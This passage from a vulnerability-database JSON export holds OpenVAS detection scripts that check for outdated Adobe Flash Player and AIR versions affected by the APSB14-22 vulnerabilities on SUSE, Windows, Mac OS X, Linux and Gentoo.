"AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2019-05-29T18:36:34", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-12T00:00:00", "published": "2015-10-16T00:00:00", "id": "OPENVAS:1361412562310851067", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851067", "title": "SuSE Update for flash-player SUSE-SU-2014:1423-1 (flash-player)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_suse_2014_1423_1.nasl 14110 2019-03-12 09:28:23Z cfischer $\n#\n# SuSE Update for flash-player SUSE-SU-2014:1423-1 (flash-player)\n#\n# Authors:\n# System Generated 
Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851067\");\n script_version(\"$Revision: 14110 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-12 10:28:23 +0100 (Tue, 12 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-10-16 19:21:12 +0200 (Fri, 16 Oct 2015)\");\n script_cve_id(\"CVE-2014-0558\", \"CVE-2014-0564\", \"CVE-2014-0569\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"SuSE Update for flash-player SUSE-SU-2014:1423-1 (flash-player)\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'flash-player'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Adobe Flash Player was updated to 11.2.202.411, fixing security issues and\n bugs.\n\n For more information please see the referenced vendor advisory.\");\n\n script_xref(name:\"URL\", 
value:\"http://helpx.adobe.com/security/products/flash-player/apsb14-22.html\");\n\n script_tag(name:\"affected\", value:\"flash-player on SUSE Linux Enterprise Desktop 12\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_xref(name:\"SUSE-SU\", value:\"2014:1423_1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=SLED12\\.0SP0\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\nres = \"\";\n\nif(release == \"SLED12.0SP0\")\n{\n\n if ((res = isrpmvuln(pkg:\"flash-player\", rpm:\"flash-player~11.2.202.411~4.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"flash-player-gnome\", rpm:\"flash-player-gnome~11.2.202.411~4.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:27", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2018-11-16T00:00:00", "published": "2015-10-15T00:00:00", "id": "OPENVAS:1361412562310850863", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310850863", "title": "SuSE Update for flash-player SUSE-SU-2014:1360-1 (flash-player)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_suse_2014_1360_1.nasl 12381 2018-11-16 11:16:30Z cfischer $\n#\n# SuSE Update for flash-player SUSE-SU-2014:1360-1 
(flash-player)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.850863\");\n script_version(\"$Revision: 12381 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-16 12:16:30 +0100 (Fri, 16 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2015-10-15 12:23:47 +0200 (Thu, 15 Oct 2015)\");\n script_cve_id(\"CVE-2014-0558\", \"CVE-2014-0564\", \"CVE-2014-0569\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"SuSE Update for flash-player SUSE-SU-2014:1360-1 (flash-player)\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'flash-player'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"This update fixes multiple code execution vulnerabilities in flash-player\n (APSB14-22). 
CVE-2014-0564, CVE-2014-0558 and CVE-2014-0569 have been\n assigned to this issue.\");\n\n script_tag(name:\"affected\", value:\"flash-player on SUSE Linux Enterprise Desktop 11 SP3\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_xref(name:\"SUSE-SU\", value:\"2014:1360_1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=SLED11\\.0SP3\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\nres = \"\";\n\nif(release == \"SLED11.0SP3\")\n{\n\n if ((res = isrpmvuln(pkg:\"flash-player\", rpm:\"flash-player~11.2.202.411~0.3.1\", rls:\"SLED11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"flash-player-gnome\", rpm:\"flash-player-gnome~11.2.202.411~0.3.1\", rls:\"SLED11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"flash-player-kde4\", rpm:\"flash-player-kde4~11.2.202.411~0.3.1\", rls:\"SLED11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-07-19T22:14:22", "bulletinFamily": "scanner", "description": "This host is installed with Adobe Flash\n Player and is prone to multiple vulnerabilities.", "modified": "2019-07-17T00:00:00", "published": "2014-10-20T00:00:00", "id": "OPENVAS:1361412562310805002", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310805002", "title": "Adobe Flash Player Multiple Vulnerabilities(APSB14-22)-(Windows)", "type": "openvas", "sourceData": 
"###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash Player Multiple Vulnerabilities(APSB14-22)-(Windows)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.805002\");\n script_version(\"2019-07-17T11:14:11+0000\");\n script_cve_id(\"CVE-2014-0558\", \"CVE-2014-0564\", \"CVE-2014-0569\", \"CVE-2014-8439\");\n script_bugtraq_id(70437, 70442, 70441, 71289);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-17 11:14:11 +0000 (Wed, 17 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2014-10-20 12:31:59 +0530 (Mon, 20 Oct 2014)\");\n\n script_name(\"Adobe Flash Player Multiple Vulnerabilities(APSB14-22)-(Windows)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash\n Player and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is 
present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple Flaws are due to,\n\n - Two unspecified errors can be exploited to corrupt memory and subsequently\n execute arbitrary code.\n\n - An integer overflow error can be exploited to execute arbitrary code.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers\n to execute arbitrary code and compromise a user's system.\");\n\n script_tag(name:\"affected\", value:\"Adobe Flash Player version before\n 13.0.0.250 and 14.x and 15.x before 15.0.0.189 on Windows\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Flash Player version\n 13.0.0.250 or 15.0.0.189 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"registry\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/59729\");\n script_xref(name:\"URL\", value:\"http://helpx.adobe.com/security/products/flash-player/apsb14-22.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_flash_player_detect_win.nasl\");\n script_mandatory_keys(\"AdobeFlashPlayer/Win/Installed\");\n\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!playerVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:playerVer, test_version:\"13.0.0.250\") ||\n version_in_range(version:playerVer, test_version:\"14.0.0\", test_version2:\"15.0.0.188\"))\n{\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-07-19T22:14:32", "bulletinFamily": "scanner", "description": "This host is installed with Adobe Flash\n Player and is prone to multiple vulnerabilities.", "modified": "2019-07-17T00:00:00", "published": "2014-10-20T00:00:00", "id": 
"OPENVAS:1361412562310805003", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310805003", "title": "Adobe Flash Player Multiple Vulnerabilities(APSB14-22)-(Mac OS X)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash Player Multiple Vulnerabilities(APSB14-22)-(Mac OS X)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.805003\");\n script_version(\"2019-07-17T11:14:11+0000\");\n script_cve_id(\"CVE-2014-0558\", \"CVE-2014-0564\", \"CVE-2014-0569\", \"CVE-2014-8439\");\n script_bugtraq_id(70437, 70442, 70441, 71289);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-17 11:14:11 +0000 (Wed, 17 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2014-10-20 12:40:11 +0530 (Mon, 20 Oct 2014)\");\n\n script_name(\"Adobe Flash Player Multiple Vulnerabilities(APSB14-22)-(Mac OS 
X)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash\n Player and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple Flaws are due to,\n\n - Two unspecified errors can be exploited to corrupt memory and subsequently\n execute arbitrary code.\n\n - An integer overflow error can be exploited to execute arbitrary code.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers\n to execute arbitrary code and compromise a user's system.\");\n\n script_tag(name:\"affected\", value:\"Adobe Flash Player version before\n 13.0.0.250 and 14.x and 15.x before 15.0.0.189 on Mac OS X\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Flash Player version\n 13.0.0.250 or 15.0.0.189 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/59729\");\n script_xref(name:\"URL\", value:\"http://helpx.adobe.com/security/products/flash-player/apsb14-22.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_adobe_prdts_detect_macosx.nasl\");\n script_mandatory_keys(\"Adobe/Flash/Player/MacOSX/Version\");\n\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!playerVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:playerVer, test_version:\"13.0.0.250\") ||\n version_in_range(version:playerVer, test_version:\"14.0.0\", test_version2:\"15.0.0.188\"))\n{\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": 
"2019-07-19T22:14:29", "bulletinFamily": "scanner", "description": "This host is installed with Adobe AIR and\n is prone to multiple vulnerabilities.", "modified": "2019-07-17T00:00:00", "published": "2014-10-20T00:00:00", "id": "OPENVAS:1361412562310805006", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310805006", "title": "Adobe AIR Multiple Vulnerabilities(APSB14-22)-(Mac OS X)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe AIR Multiple Vulnerabilities(APSB14-22)-(Mac OS X)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:adobe_air\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.805006\");\n script_version(\"2019-07-17T11:14:11+0000\");\n script_cve_id(\"CVE-2014-0558\", \"CVE-2014-0564\", \"CVE-2014-0569\", \"CVE-2014-8439\");\n script_bugtraq_id(70437, 70442, 70441, 71289);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-17 11:14:11 +0000 (Wed, 17 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2014-10-20 12:56:20 +0530 (Mon, 20 Oct 2014)\");\n\n script_name(\"Adobe AIR Multiple Vulnerabilities(APSB14-22)-(Mac OS X)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe AIR and\n is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple Flaws are due to,\n\n - Two unspecified errors can be exploited to corrupt memory and subsequently\n execute arbitrary code.\n\n - An integer overflow error can be exploited to execute arbitrary code.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers\n to execute arbitrary code and compromise a user's system.\");\n\n script_tag(name:\"affected\", value:\"Adobe AIR version before 15.0.0.293 on\n Mac OS X\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe AIR 15.0.0.293 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n 
script_xref(name:\"URL\", value:\"http://secunia.com/advisories/59729\");\n script_xref(name:\"URL\", value:\"http://helpx.adobe.com/security/products/flash-player/apsb14-22.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_adobe_prdts_detect_macosx.nasl\");\n script_mandatory_keys(\"Adobe/Air/MacOSX/Version\");\n\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!airVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:airVer, test_version:\"15.0.0.293\"))\n{\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-07-19T22:14:37", "bulletinFamily": "scanner", "description": "This host is installed with Adobe Flash\n Player and is prone to multiple vulnerabilities.", "modified": "2019-07-17T00:00:00", "published": "2014-10-20T00:00:00", "id": "OPENVAS:1361412562310805004", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310805004", "title": "Adobe Flash Player Multiple Vulnerabilities(APSB14-22)-(Linux)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash Player Multiple Vulnerabilities(APSB14-22)-(Linux)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR 
PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.805004\");\n script_version(\"2019-07-17T11:14:11+0000\");\n script_cve_id(\"CVE-2014-0558\", \"CVE-2014-0564\", \"CVE-2014-0569\", \"CVE-2014-8439\");\n script_bugtraq_id(70437, 70442, 70441, 71289);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-17 11:14:11 +0000 (Wed, 17 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2014-10-20 12:43:30 +0530 (Mon, 20 Oct 2014)\");\n\n script_name(\"Adobe Flash Player Multiple Vulnerabilities(APSB14-22)-(Linux)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash\n Player and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple Flaws are due to,\n\n - Two unspecified errors can be exploited to corrupt memory and subsequently\n execute arbitrary code.\n\n - An integer overflow error can be exploited to execute arbitrary code.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers\n to execute arbitrary code and compromise a user's system.\");\n\n script_tag(name:\"affected\", value:\"Adobe Flash Player before 11.2.202.411\n on Linux\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Flash Player version\n 11.2.202.411 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n 
script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/59729\");\n script_xref(name:\"URL\", value:\"http://helpx.adobe.com/security/products/flash-player/apsb14-22.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_flash_player_detect_lin.nasl\");\n script_mandatory_keys(\"AdobeFlashPlayer/Linux/Ver\");\n\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!playerVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:playerVer, test_version:\"11.2.202.411\"))\n{\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-07-19T22:14:27", "bulletinFamily": "scanner", "description": "This host is installed with Adobe AIR and\n is prone to multiple vulnerabilities.", "modified": "2019-07-17T00:00:00", "published": "2014-10-20T00:00:00", "id": "OPENVAS:1361412562310805005", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310805005", "title": "Adobe AIR Multiple Vulnerabilities(APSB14-22)-(Windows)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe AIR Multiple Vulnerabilities(APSB14-22)-(Windows)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty 
of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:adobe_air\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.805005\");\n script_version(\"2019-07-17T11:14:11+0000\");\n script_cve_id(\"CVE-2014-0558\", \"CVE-2014-0564\", \"CVE-2014-0569\", \"CVE-2014-8439\");\n script_bugtraq_id(70437, 70442, 70441, 71289);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-17 11:14:11 +0000 (Wed, 17 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2014-10-20 12:51:31 +0530 (Mon, 20 Oct 2014)\");\n\n script_name(\"Adobe AIR Multiple Vulnerabilities(APSB14-22)-(Windows)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe AIR and\n is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple Flaws are due to,\n\n - Two unspecified errors can be exploited to corrupt memory and subsequently\n execute arbitrary code.\n\n - An integer overflow error can be exploited to execute arbitrary code.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers\n to execute arbitrary code and compromise a user's system.\");\n\n script_tag(name:\"affected\", value:\"Adobe AIR version before 15.0.0.293 on\n Windows\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe AIR 15.0.0.293 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n 
script_tag(name:\"qod_type\", value:\"registry\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/59729\");\n script_xref(name:\"URL\", value:\"http://helpx.adobe.com/security/products/flash-player/apsb14-22.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_flash_player_detect_win.nasl\");\n script_mandatory_keys(\"Adobe/Air/Win/Installed\");\n\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!airVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:airVer, test_version:\"15.0.0.293\"))\n{\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:23", "bulletinFamily": "scanner", "description": "Gentoo Linux Local Security Checks GLSA 201411-06", "modified": "2018-10-26T00:00:00", "published": "2015-09-29T00:00:00", "id": "OPENVAS:1361412562310121281", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310121281", "title": "Gentoo Security Advisory GLSA 201411-06", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: glsa-201411-06.nasl 12128 2018-10-26 13:35:25Z cfischer $\n#\n# Gentoo Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS 
FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.121281\");\n script_version(\"$Revision: 12128 $\");\n script_tag(name:\"creation_date\", value:\"2015-09-29 11:27:59 +0300 (Tue, 29 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 15:35:25 +0200 (Fri, 26 Oct 2018) $\");\n script_name(\"Gentoo Security Advisory GLSA 201411-06\");\n script_tag(name:\"insight\", value:\"Multiple vulnerabilities have been discovered in Adobe Flash Player. Please review the CVE identifiers referenced below for details.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://security.gentoo.org/glsa/201411-06\");\n script_cve_id(\"CVE-2014-0558\", \"CVE-2014-0564\", \"CVE-2014-0569\", \"CVE-2014-0573\", \"CVE-2014-0574\", \"CVE-2014-0576\", \"CVE-2014-0577\", \"CVE-2014-0581\", \"CVE-2014-0582\", \"CVE-2014-0583\", \"CVE-2014-0584\", \"CVE-2014-0585\", \"CVE-2014-0586\", \"CVE-2014-0588\", \"CVE-2014-0589\", \"CVE-2014-0590\", \"CVE-2014-8437\", \"CVE-2014-8438\", \"CVE-2014-8440\", \"CVE-2014-8441\", \"CVE-2014-8442\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n 